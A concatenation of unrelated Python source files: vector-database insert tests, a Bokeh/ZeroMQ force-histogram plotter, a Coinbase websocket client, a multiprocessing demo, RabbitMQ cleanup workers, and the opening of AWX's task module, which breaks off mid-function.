res = connect.search(collection, default_single_query)
logging.getLogger().debug(res)
ids = connect.bulk_insert(collection_name, default_entity)
connect.flush()
count = connect.count_entities(collection_name)
assert count == 1
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_vector_search_vector_another(self, connect, collection):
'''
target: test insert vector to collection_1 after search collection_2
method: search collection and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection, default_entity)
result = connect.search(collection_name, default_single_query)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_vector_sleep_search_vector_another(self, connect, collection):
'''
target: test insert vector to collection_1 after search collection_2 a while
method: search collection , sleep, and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection, default_entity)
connect.flush([collection])
result = connect.search(collection_name, default_single_query)
class TestInsertInvalid(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
def test_insert_ids_invalid(self, connect, id_collection, get_entity_id):
'''
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
'''
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.bulk_insert(id_collection, default_entities, ids)
def test_insert_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception):
connect.bulk_insert(collection_name, default_entity)
def test_insert_with_invalid_tag_name(self, connect, collection, get_tag_name):
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
if tag_name is not None:
with pytest.raises(Exception):
connect.bulk_insert(collection, default_entity, partition_tag=tag_name)
else:
connect.bulk_insert(collection, default_entity, partition_tag=tag_name)
def test_insert_with_invalid_field_name(self, connect, collection, get_field_name):
field_name = get_field_name
tmp_entity = update_field_name(copy.deepcopy(default_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
@pytest.mark.skip("laster add check of field type")
def test_insert_with_invalid_field_type(self, connect, collection, get_field_type):
field_type = get_field_type
tmp_entity = update_field_type(copy.deepcopy(default_entity), 'float', field_type)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
@pytest.mark.skip("laster add check of field value")
def test_insert_with_invalid_field_value(self, connect, collection, get_field_int_value):
field_value = get_field_int_value
tmp_entity = update_field_type(copy.deepcopy(default_entity), 'int64', field_value)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_invalid_field_vector_value(self, connect, collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_entity)
src_vector = tmp_entity[-1]["values"]
src_vector[0][1] = get_field_vectors_value
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
class TestInsertInvalidBinary(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.level(2)
def test_insert_with_invalid_field_name(self, connect, binary_collection, get_field_name):
tmp_entity = update_field_name(copy.deepcopy(default_binary_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
@pytest.mark.skip("todo support row data check")
@pytest.mark.level(2)
def test_insert_with_invalid_field_value(self, connect, binary_collection, get_field_int_value):
tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', get_field_int_value)
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
@pytest.mark.skip("todo support row data check")
@pytest.mark.level(2)
def test_insert_with_invalid_field_vector_value(self, connect, binary_collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_binary_entity)
src_vector = tmp_entity[-1]["values"]
src_vector[0][1] = get_field_vectors_value
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_ids_invalid(self, connect, binary_id_collection, get_entity_id):
'''
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
'''
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.bulk_insert(binary_id_collection, default_binary_entities, ids)
@pytest.mark.skip("check filed")
@pytest.mark.level(2)
def test_insert_with_invalid_field_type(self, connect, binary_collection, get_field_type):
field_type = get_field_type
tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', field_type)
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
@pytest.mark.skip("check field")
@pytest.mark.level(2)
def test_insert_with_invalid_field_vector_value(self, connect, binary_collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_binary_entities)
src_vector = tmp_entity[-1]["values"]
src_vector[1] = get_field_vectors_value
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
|
threadHistResForces.py | from bokeh.io import curdoc
from bokeh.models import ColumnDataSource
from bokeh.plotting import figure
from bokeh.layouts import gridplot, row, layout, column
import numpy as np
import time
import cProfile
import random
import zmq
import pickle
import pdb
import time
from bokeh.models import LinearAxis, Range1d
from bokeh.models import Span
from functools import partial
from threading import Thread
from tornado import gen
from helper_functions import *
rpi_emulator = True
brian = False
if rpi_emulator:
ip = '127.0.0.1'
elif brian:
ip = '169.254.12.240'
else:
ip = '10.42.0.82'
port_sub = '12345'
doc = curdoc()
source_forces = ColumnDataSource(dict(time=[],residual_M0=[],residual_M1=[],residual_M2=[],residual_M3=[],residual_M4=[],residual_M5=[],residual_M6=[]))
source_plot = ColumnDataSource(dict(hist_M0=[],hist_M1=[],hist_M2=[],hist_M3=[],hist_M4=[],hist_M5=[],hist_M6=[],ledges_M0=[], ledges_M1=[], ledges_M2=[], ledges_M3=[], ledges_M4=[], ledges_M5=[], ledges_M6=[], redges_M0=[], redges_M1=[], redges_M2=[], redges_M3=[], redges_M4=[], redges_M5=[], redges_M6=[]))
@gen.coroutine
def update(plotData,residualForces):
source_forces.stream(residualForces,100)
source_plot.stream(plotData,100)
def modify_to_plot():
hist = []
edges = []
for i in range(7):
histogram = np.histogram(source_forces.data['residual_M%s'%i])
for j in range(len(histogram[1])):
histogram[1][j] = (histogram[1][j] + i*1)
hist.append(histogram[0])
edges.append(histogram[1])
return(hist,edges)
def compose_column_data_source_entry(timestamp, residualForces, hist, edges):
residualForces = dict(time=[timestamp],residual_M0=[residualForces[0]],residual_M1=[residualForces[1]],residual_M2=[residualForces[2]],residual_M3=[residualForces[3]],residual_M4=[residualForces[4]],residual_M5=[residualForces[5]],residual_M6=[residualForces[6]])
plotData = dict(hist_M0=hist[0].tolist(),hist_M1=hist[1].tolist(),hist_M2=hist[2].tolist(),hist_M3=hist[3].tolist(),hist_M4=hist[4].tolist(),hist_M5=hist[5].tolist(),hist_M6=hist[6].tolist(),ledges_M0=edges[0][:-1].tolist(),ledges_M1=edges[1][:-1].tolist(),ledges_M2=edges[2][:-1].tolist(),ledges_M3=edges[3][:-1].tolist(),ledges_M4=edges[4][:-1].tolist(),ledges_M5=edges[5][:-1].tolist(),ledges_M6=edges[6][:-1].tolist(),redges_M0=edges[0][1:].tolist(),redges_M1=edges[1][1:].tolist(),redges_M2=edges[2][1:].tolist(),redges_M3=edges[3][1:].tolist(),redges_M4=edges[4][1:].tolist(),redges_M5=edges[5][1:].tolist(),redges_M6=edges[6][1:].tolist())
return(residualForces, plotData)
def subscribe_and_stream():
global fig
while True:
global socket_sub, fig
try:
poller = zmq.Poller()
poller.register(socket_sub, zmq.POLLIN)
socks = dict(poller.poll())
if socket_sub in socks and socks[socket_sub] == zmq.POLLIN:
[topic, msg] = socket_sub.recv_multipart()
message = (pickle.loads(msg, encoding="latin1"))
measuredForces = message[0][0]
referenceForces = message[0][1]
residualForces = [(message[0][0][i]-message[0][1][i]) for i in range(7)]
commands = message[0][2]
timestamp = message[1]
diff = time.time() - timestamp
print(diff)
# if diff > 0.001:
# print("RESET CONNECTION")
# socket_sub = initialize_sub_socket(ip, port_sub)
hist,edges = modify_to_plot()
residualForces, plotData = compose_column_data_source_entry(timestamp, residualForces, hist, edges)
doc.add_next_tick_callback(partial(update,plotData,residualForces))
except KeyboardInterrupt:
print("CLEAN UP CLEAN UP EVERYBODY CLEANUP")
while not socket_sub.closed:
make_clean_exit(socket_sub)
colors = ["#762a83", "#76EEC6", "#53868B",
"#FF1493", "#ADFF2F", "#292421", "#EE6A50"]
gap = 1
fig = figure(plot_width=1400, plot_height=700, x_range=(-0.5,6.5))
for muscle_index in range(7):
loc = gap*muscle_index
line = Span(location=loc, dimension='height', line_color='black', line_dash='dashed', line_width=1)
fig.add_layout(line)
fig.quad(source=source_plot, top='hist_M%s'%muscle_index, bottom=0, left='ledges_M%s'%muscle_index, right='redges_M%s'%muscle_index, color=colors[muscle_index])
doc.add_root(fig)
socket_sub = initialize_sub_socket(ip, port_sub)
print("Plotting Histogram...")
thread = Thread(target=subscribe_and_stream)
thread.start()
|
websocket_client.py | # cbpro/WebsocketClient.py
# original author: Daniel Paquin
# mongo "support" added by Drew Rice
#
#
# Template object to receive messages from the Coinbase Websocket Feed
from __future__ import print_function
import json
import base64
import hmac
import hashlib
import time
from threading import Thread
from websocket import create_connection, WebSocketConnectionClosedException
from cbpro.cbpro_auth import get_auth_headers
class WebsocketClient(object):
def __init__(
self,
url="wss://ws-feed.pro.coinbase.com",
products=None,
message_type="subscribe",
mongo_collection=None,
should_print=True,
auth=False,
api_key="",
api_secret="",
api_passphrase="",
# Make channels a required keyword-only argument; see pep3102
*,
# Channel options: ['ticker', 'user', 'matches', 'level2', 'full']
channels):
self.url = url
self.products = products
self.channels = channels
self.type = message_type
self.stop = True
self.error = None
self.ws = None
self.thread = None
self.auth = auth
self.api_key = api_key
self.api_secret = api_secret
self.api_passphrase = api_passphrase
self.should_print = should_print
self.mongo_collection = mongo_collection
def start(self):
def _go():
self._connect()
self._listen()
self._disconnect()
self.stop = False
self.on_open()
self.thread = Thread(target=_go)
self.keepalive = Thread(target=self._keepalive)
self.thread.start()
def _connect(self):
if self.products is None:
self.products = ["BTC-USD"]
elif not isinstance(self.products, list):
self.products = [self.products]
if self.url[-1] == "/":
self.url = self.url[:-1]
if self.channels is None:
self.channels = [{"name": "ticker", "product_ids": [product_id for product_id in self.products]}]
sub_params = {'type': 'subscribe', 'product_ids': self.products, 'channels': self.channels}
else:
sub_params = {'type': 'subscribe', 'product_ids': self.products, 'channels': self.channels}
if self.auth:
timestamp = str(time.time())
message = timestamp + 'GET' + '/users/self/verify'
auth_headers = get_auth_headers(timestamp, message, self.api_key, self.api_secret, self.api_passphrase)
sub_params['signature'] = auth_headers['CB-ACCESS-SIGN']
sub_params['key'] = auth_headers['CB-ACCESS-KEY']
sub_params['passphrase'] = auth_headers['CB-ACCESS-PASSPHRASE']
sub_params['timestamp'] = auth_headers['CB-ACCESS-TIMESTAMP']
self.ws = create_connection(self.url)
self.ws.send(json.dumps(sub_params))
def _keepalive(self, interval=30):
while self.ws.connected:
self.ws.ping("keepalive")
time.sleep(interval)
def _listen(self):
self.keepalive.start()
while not self.stop:
try:
data = self.ws.recv()
msg = json.loads(data)
except ValueError as e:
self.on_error(e)
except Exception as e:
self.on_error(e)
else:
self.on_message(msg)
def _disconnect(self):
try:
if self.ws:
self.ws.close()
except WebSocketConnectionClosedException as e:
pass
finally:
self.keepalive.join()
self.on_close()
def close(self):
self.stop = True # will only disconnect after next msg recv
self._disconnect() # force disconnect so threads can join
self.thread.join()
def on_open(self):
if self.should_print:
print("-- Subscribed! --\n")
def on_close(self):
if self.should_print:
print("\n-- Socket Closed --")
def on_message(self, msg):
if self.should_print:
print(msg)
if self.mongo_collection: # dump JSON to given mongo collection
self.mongo_collection.insert_one(msg)
def on_error(self, e, data=None):
self.error = e
self.stop = True
print('{} - data: {}'.format(e, data))
if __name__ == "__main__":
import sys
import cbpro
import time
class MyWebsocketClient(cbpro.WebsocketClient):
def on_open(self):
self.url = "wss://ws-feed.pro.coinbase.com/"
self.products = ["BTC-USD", "ETH-USD"]
self.message_count = 0
print("Let's count the messages!")
def on_message(self, msg):
print(json.dumps(msg, indent=4, sort_keys=True))
self.message_count += 1
def on_close(self):
print("-- Goodbye! --")
wsClient = MyWebsocketClient()
wsClient.start()
print(wsClient.url, wsClient.products)
try:
while True:
print("\nMessageCount =", "%i \n" % wsClient.message_count)
time.sleep(1)
except KeyboardInterrupt:
wsClient.close()
if wsClient.error:
sys.exit(1)
else:
sys.exit(0)
|
2.py | from multiprocessing import Pool,Process
import time
import os
def info():
print 'module name:', __name__
if hasattr(os, 'getppid'): # only available on Unix
print 'parent process:', os.getppid()
print 'process id:', os.getpid()
def run(x):
info()
time.sleep(1)
print x**x
return x*x
def func1(x):
info()
time.sleep(1)
print 'func1'
return x*x
def func2(x):
info()
time.sleep(1)
print 'func2'
return x*x
def pool1():
testFL = [1, 2, 3, 4, 5, 6]
s = time.time()
for fn in testFL:
run(fn)
e1 = time.time()
print int(e1 - s)
p = Pool(5)
result = p.map(run, testFL)
print result
e2 = time.time()
print int(e2 - e1)
def join1():
p1 = Process(target=run, args=(1,))
p1.start()
p2 = Process(target=run, args=(2,))
p2.start()
p1.join()
p2.join()
print 'master begin'
info()
if __name__ == '__main__':
pool = Pool(3)
s = time.time()
result1 = pool.apply_async(func1, (1,))
result2 = pool.apply_async(func2, (2,))
result3 = pool.apply_async(func2, (3,))
print type(result1.get())
print result2.get()
print result3.get()
e = time.time()
print int(e - s)
pool.close()
pool.join()
|
CleanupWorkers.py | import json
import structlog
import pika
import config
from multiprocessing import Process
from ServiceManager import ServiceInfo, cleanupService
logger = structlog.get_logger()
def cleanupCallback(ch, method, properties, body):
"""Take service off of queue and delete its corresponding container"""
logger.info("cleanupCallback", msg="Recieved Message", body=body)
body = json.loads(body)
service = ServiceInfo(body)
log = logger.bind(service=service.__dict__)
log.info("cleanupCallback", msg="Cleaning Up Service")
cleanupService(service)
ch.basic_ack(delivery_tag=method.delivery_tag)
log.info("cleanupCallback", msg="Service Cleanup Done")
def cleanupWorker():
"""Declare cleanup queue and callback"""
connection = pika.BlockingConnection(pika.ConnectionParameters(config.RABBITMQ_SERVER))
channel = connection.channel()
channel.queue_declare(queue='cleanupQueue', durable=True)
logger.info("cleanupWorker", msg="Starting Cleanup Worker", queue="cleanupQueue")
channel.basic_consume(cleanupCallback, queue='cleanupQueue')
channel.start_consuming()
def startCleanupWorkers(numThreads):
"""Start numThreads cleanup workers"""
for i in range(numThreads):
t = Process(target=cleanupWorker)
t.daemon = True
t.start()
|
tasks.py | # -*- coding: utf-8 -*-
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from collections import OrderedDict, namedtuple, deque
import errno
import functools
import importlib
import json
import logging
import os
import shutil
import stat
import tempfile
import time
import traceback
from distutils.dir_util import copy_tree
from distutils.version import LooseVersion as Version
import yaml
import fcntl
from pathlib import Path
from uuid import uuid4
import urllib.parse as urlparse
import socket
import threading
import concurrent.futures
from base64 import b64encode
import subprocess
import sys
# Django
from django.conf import settings
from django.db import transaction, DatabaseError, IntegrityError
from django.db.models.fields.related import ForeignKey
from django.utils.timezone import now
from django.utils.encoding import smart_str
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _, gettext_noop
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django_guid.middleware import GuidMiddleware
# Django-CRUM
from crum import impersonate
# GitPython
import git
from gitdb.exc import BadName as BadGitName
# Runner
import ansible_runner
# Receptor
from receptorctl.socket_interface import ReceptorControl
# AWX
from awx import __version__ as awx_application_version
from awx.main.constants import PRIVILEGE_ESCALATION_METHODS, STANDARD_INVENTORY_UPDATE_ENV, MINIMAL_EVENTS
from awx.main.access import access_registry
from awx.main.redact import UriCleaner
from awx.main.models import (
Schedule,
TowerScheduleState,
Instance,
InstanceGroup,
UnifiedJob,
Notification,
Inventory,
InventorySource,
SmartInventoryMembership,
Job,
AdHocCommand,
ProjectUpdate,
InventoryUpdate,
SystemJob,
JobEvent,
ProjectUpdateEvent,
InventoryUpdateEvent,
AdHocCommandEvent,
SystemJobEvent,
build_safe_env,
)
from awx.main.constants import ACTIVE_STATES
from awx.main.exceptions import AwxTaskError, PostRunError
from awx.main.queue import CallbackQueueDispatcher
from awx.main.dispatch.publish import task
from awx.main.dispatch import get_local_queuename, reaper
from awx.main.utils import (
update_scm_url,
ignore_inventory_computed_fields,
ignore_inventory_group_removal,
extract_ansible_vars,
schedule_task_manager,
get_awx_version,
deepmerge,
parse_yaml_or_json,
cleanup_new_process,
)
from awx.main.utils.execution_environments import get_default_execution_environment, get_default_pod_spec, CONTAINER_ROOT, to_container_path
from awx.main.utils.ansible import read_ansible_config
from awx.main.utils.external_logging import reconfigure_rsyslog
from awx.main.utils.safe_yaml import safe_dump, sanitize_jinja
from awx.main.utils.reload import stop_local_services
from awx.main.utils.pglock import advisory_lock
from awx.main.utils.handlers import SpecialInventoryHandler
from awx.main.consumers import emit_channel_notification
from awx.main import analytics
from awx.conf import settings_registry
from awx.conf.license import get_license
from awx.main.analytics.subsystem_metrics import Metrics
from rest_framework.exceptions import PermissionDenied
__all__ = [
'RunJob',
'RunSystemJob',
'RunProjectUpdate',
'RunInventoryUpdate',
'RunAdHocCommand',
'handle_work_error',
'handle_work_success',
'apply_cluster_membership_policies',
'update_inventory_computed_fields',
'update_host_smart_inventory_memberships',
'send_notifications',
'purge_old_stdout_files',
]
HIDDEN_PASSWORD = '**********'
OPENSSH_KEY_ERROR = u'''\
It looks like you're trying to use a private key in OpenSSH format, which \
isn't supported by the installed version of OpenSSH on this instance. \
Try upgrading OpenSSH or providing your private key in an different format. \
'''
logger = logging.getLogger('awx.main.tasks')
class InvalidVirtualenvError(Exception):
def __init__(self, message):
self.message = message
def dispatch_startup():
startup_logger = logging.getLogger('awx.main.tasks')
startup_logger.debug("Syncing Schedules")
for sch in Schedule.objects.all():
try:
sch.update_computed_fields()
except Exception:
logger.exception("Failed to rebuild schedule {}.".format(sch))
#
# When the dispatcher starts, if the instance cannot be found in the database,
# automatically register it. This is mostly useful for openshift-based
# deployments where:
#
# 2 Instances come online
# Instance B encounters a network blip, Instance A notices, and
# deprovisions it
# Instance B's connectivity is restored, the dispatcher starts, and it
# re-registers itself
#
# In traditional container-less deployments, instances don't get
# deprovisioned when they miss their heartbeat, so this code is mostly a
# no-op.
#
apply_cluster_membership_policies()
cluster_node_heartbeat()
Metrics().clear_values()
# Update Tower's rsyslog.conf file based on loggins settings in the db
reconfigure_rsyslog()
def inform_cluster_of_shutdown():
try:
this_inst = Instance.objects.get(hostname=settings.CLUSTER_HOST_ID)
this_inst.capacity = 0 # No thank you to new jobs while shut down
this_inst.save(update_fields=['capacity', 'modified'])
try:
reaper.reap(this_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(this_inst.hostname))
logger.warning('Normal shutdown signal for instance {}, ' 'removed self from capacity pool.'.format(this_inst.hostname))
except Exception:
logger.exception('Encountered problem with normal shutdown signal.')
@task(queue=get_local_queuename)
def apply_cluster_membership_policies():
started_waiting = time.time()
with advisory_lock('cluster_policy_lock', wait=True):
lock_time = time.time() - started_waiting
if lock_time > 1.0:
to_log = logger.info
else:
to_log = logger.debug
to_log('Waited {} seconds to obtain lock name: cluster_policy_lock'.format(lock_time))
started_compute = time.time()
all_instances = list(Instance.objects.order_by('id'))
all_groups = list(InstanceGroup.objects.prefetch_related('instances'))
total_instances = len(all_instances)
actual_groups = []
actual_instances = []
Group = namedtuple('Group', ['obj', 'instances', 'prior_instances'])
Node = namedtuple('Instance', ['obj', 'groups'])
# Process policy instance list first, these will represent manually managed memberships
instance_hostnames_map = {inst.hostname: inst for inst in all_instances}
for ig in all_groups:
group_actual = Group(obj=ig, instances=[], prior_instances=[instance.pk for instance in ig.instances.all()]) # obtained in prefetch
for hostname in ig.policy_instance_list:
if hostname not in instance_hostnames_map:
logger.info("Unknown instance {} in {} policy list".format(hostname, ig.name))
continue
inst = instance_hostnames_map[hostname]
group_actual.instances.append(inst.id)
# NOTE: arguable behavior: policy-list-group is not added to
# instance's group count for consideration in minimum-policy rules
if group_actual.instances:
logger.debug("Policy List, adding Instances {} to Group {}".format(group_actual.instances, ig.name))
actual_groups.append(group_actual)
# Process Instance minimum policies next, since it represents a concrete lower bound to the
# number of instances to make available to instance groups
actual_instances = [Node(obj=i, groups=[]) for i in all_instances if i.managed_by_policy]
logger.debug("Total instances: {}, available for policy: {}".format(total_instances, len(actual_instances)))
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_min_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if len(g.instances) >= g.obj.policy_instance_minimum:
break
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via the policy list
continue
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_min_added.append(i.obj.id)
if policy_min_added:
logger.debug("Policy minimum, adding Instances {} to Group {}".format(policy_min_added, g.obj.name))
# Finally, process instance policy percentages
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_per_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via a minimum policy or policy list
continue
if 100 * float(len(g.instances)) / len(actual_instances) >= g.obj.policy_instance_percentage:
break
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_per_added.append(i.obj.id)
if policy_per_added:
logger.debug("Policy percentage, adding Instances {} to Group {}".format(policy_per_added, g.obj.name))
# Determine if any changes need to be made
needs_change = False
for g in actual_groups:
if set(g.instances) != set(g.prior_instances):
needs_change = True
break
if not needs_change:
logger.debug('Cluster policy no-op finished in {} seconds'.format(time.time() - started_compute))
return
# On a differential basis, apply instances to groups
with transaction.atomic():
for g in actual_groups:
if g.obj.is_container_group:
logger.debug('Skipping containerized group {} for policy calculation'.format(g.obj.name))
continue
instances_to_add = set(g.instances) - set(g.prior_instances)
instances_to_remove = set(g.prior_instances) - set(g.instances)
if instances_to_add:
logger.debug('Adding instances {} to group {}'.format(list(instances_to_add), g.obj.name))
g.obj.instances.add(*instances_to_add)
if instances_to_remove:
logger.debug('Removing instances {} from group {}'.format(list(instances_to_remove), g.obj.name))
g.obj.instances.remove(*instances_to_remove)
logger.debug('Cluster policy computation finished in {} seconds'.format(time.time() - started_compute))
@task(queue='tower_broadcast_all')
def handle_setting_changes(setting_keys):
orig_len = len(setting_keys)
for i in range(orig_len):
for dependent_key in settings_registry.get_dependent_settings(setting_keys[i]):
setting_keys.append(dependent_key)
cache_keys = set(setting_keys)
logger.debug('cache delete_many(%r)', cache_keys)
cache.delete_many(cache_keys)
if any([setting.startswith('LOG_AGGREGATOR') for setting in setting_keys]):
reconfigure_rsyslog()
@task(queue='tower_broadcast_all')
def delete_project_files(project_path):
# TODO: possibly implement some retry logic
lock_file = project_path + '.lock'
if os.path.exists(project_path):
try:
shutil.rmtree(project_path)
logger.debug('Success removing project files {}'.format(project_path))
except Exception:
logger.exception('Could not remove project directory {}'.format(project_path))
if os.path.exists(lock_file):
try:
os.remove(lock_file)
logger.debug('Success removing {}'.format(lock_file))
except Exception:
logger.exception('Could not remove lock file {}'.format(lock_file))
@task(queue='tower_broadcast_all')
def profile_sql(threshold=1, minutes=1):
if threshold <= 0:
cache.delete('awx-profile-sql-threshold')
logger.error('SQL PROFILING DISABLED')
else:
cache.set('awx-profile-sql-threshold', threshold, timeout=minutes * 60)
logger.error('SQL QUERIES >={}s ENABLED FOR {} MINUTE(S)'.format(threshold, minutes))
@task(queue=get_local_queuename)
def send_notifications(notification_list, job_id=None):
if not isinstance(notification_list, list):
raise TypeError("notification_list should be of type list")
if job_id is not None:
job_actual = UnifiedJob.objects.get(id=job_id)
notifications = Notification.objects.filter(id__in=notification_list)
if job_id is not None:
job_actual.notifications.add(*notifications)
for notification in notifications:
update_fields = ['status', 'notifications_sent']
try:
sent = notification.notification_template.send(notification.subject, notification.body)
notification.status = "successful"
notification.notifications_sent = sent
if job_id is not None:
job_actual.log_lifecycle("notifications_sent")
except Exception as e:
logger.exception("Send Notification Failed {}".format(e))
notification.status = "failed"
notification.error = smart_str(e)
update_fields.append('error')
finally:
try:
notification.save(update_fields=update_fields)
except Exception:
logger.exception('Error saving notification {} result.'.format(notification.id))
@task(queue=get_local_queuename)
def gather_analytics():
from awx.conf.models import Setting
from rest_framework.fields import DateTimeField
last_gather = Setting.objects.filter(key='AUTOMATION_ANALYTICS_LAST_GATHER').first()
last_time = DateTimeField().to_internal_value(last_gather.value) if last_gather and last_gather.value else None
gather_time = now()
if not last_time or ((gather_time - last_time).total_seconds() > settings.AUTOMATION_ANALYTICS_GATHER_INTERVAL):
analytics.gather()
@task(queue=get_local_queuename)
def purge_old_stdout_files():
nowtime = time.time()
for f in os.listdir(settings.JOBOUTPUT_ROOT):
if os.path.getctime(os.path.join(settings.JOBOUTPUT_ROOT, f)) < nowtime - settings.LOCAL_STDOUT_EXPIRE_TIME:
os.unlink(os.path.join(settings.JOBOUTPUT_ROOT, f))
logger.debug("Removing {}".format(os.path.join(settings.JOBOUTPUT_ROOT, f)))
@task(queue=get_local_queuename)
def cleanup_execution_environment_images():
if settings.IS_K8S:
return
process = subprocess.run('podman images --filter="dangling=true" --format json'.split(" "), capture_output=True)
if process.returncode != 0:
logger.debug("Cleanup execution environment images: could not get list of images")
return
if len(process.stdout) > 0:
images_system = json.loads(process.stdout)
for e in images_system:
image_name = e["Id"]
logger.debug(f"Cleanup execution environment images: deleting {image_name}")
process = subprocess.run(['podman', 'rmi', image_name, '-f'], stdout=subprocess.DEVNULL)
if process.returncode != 0:
logger.debug(f"Failed to delete image {image_name}")
@task(queue=get_local_queuename)
def cluster_node_heartbeat():
logger.debug("Cluster node heartbeat task.")
nowtime = now()
instance_list = list(Instance.objects.all())
this_inst = None
lost_instances = []
(changed, instance) = Instance.objects.get_or_register()
if changed:
logger.info("Registered tower node '{}'".format(instance.hostname))
for inst in list(instance_list):
if inst.hostname == settings.CLUSTER_HOST_ID:
this_inst = inst
instance_list.remove(inst)
elif inst.is_lost(ref_time=nowtime):
lost_instances.append(inst)
instance_list.remove(inst)
if this_inst:
startup_event = this_inst.is_lost(ref_time=nowtime)
this_inst.refresh_capacity()
if startup_event:
logger.warning('Rejoining the cluster as instance {}.'.format(this_inst.hostname))
return
else:
raise RuntimeError("Cluster Host Not Found: {}".format(settings.CLUSTER_HOST_ID))
# IFF any node has a greater version than we do, then we'll shutdown services
for other_inst in instance_list:
if other_inst.version == "":
continue
if Version(other_inst.version.split('-', 1)[0]) > Version(awx_application_version.split('-', 1)[0]) and not settings.DEBUG:
logger.error(
"Host {} reports version {}, but this node {} is at {}, shutting down".format(
other_inst.hostname, other_inst.version, this_inst.hostname, this_inst.version
)
)
# Shutdown signal will set the capacity to zero to ensure no Jobs get added to this instance.
# The heartbeat task will reset the capacity to the system capacity after upgrade.
stop_local_services(communicate=False)
raise RuntimeError("Shutting down.")
for other_inst in lost_instances:
try:
reaper.reap(other_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(other_inst.hostname))
try:
# Capacity could already be 0 because:
# * It's a new node and it never had a heartbeat
# * It was set to 0 by another tower node running this method
# * It was set to 0 by this node, but auto deprovisioning is off
#
# If auto deprovisining is on, don't bother setting the capacity to 0
# since we will delete the node anyway.
if other_inst.capacity != 0 and not settings.AWX_AUTO_DEPROVISION_INSTANCES:
other_inst.capacity = 0
other_inst.save(update_fields=['capacity'])
logger.error("Host {} last checked in at {}, marked as lost.".format(other_inst.hostname, other_inst.modified))
elif settings.AWX_AUTO_DEPROVISION_INSTANCES:
deprovision_hostname = other_inst.hostname
other_inst.delete()
logger.info("Host {} Automatically Deprovisioned.".format(deprovision_hostname))
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Another instance has marked {} as lost'.format(other_inst.hostname))
else:
logger.exception('Error marking {} as lost'.format(other_inst.hostname))
@task(queue=get_local_queuename)
def awx_k8s_reaper():
if not settings.RECEPTOR_RELEASE_WORK:
return
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
for group in InstanceGroup.objects.filter(is_container_group=True).iterator():
logger.debug("Checking for orphaned k8s pods for {}.".format(group))
pods = PodManager.list_active_jobs(group)
for job in UnifiedJob.objects.filter(pk__in=pods.keys()).exclude(status__in=ACTIVE_STATES):
logger.debug('{} is no longer active, reaping orphaned k8s pod'.format(job.log_format))
try:
pm = PodManager(job)
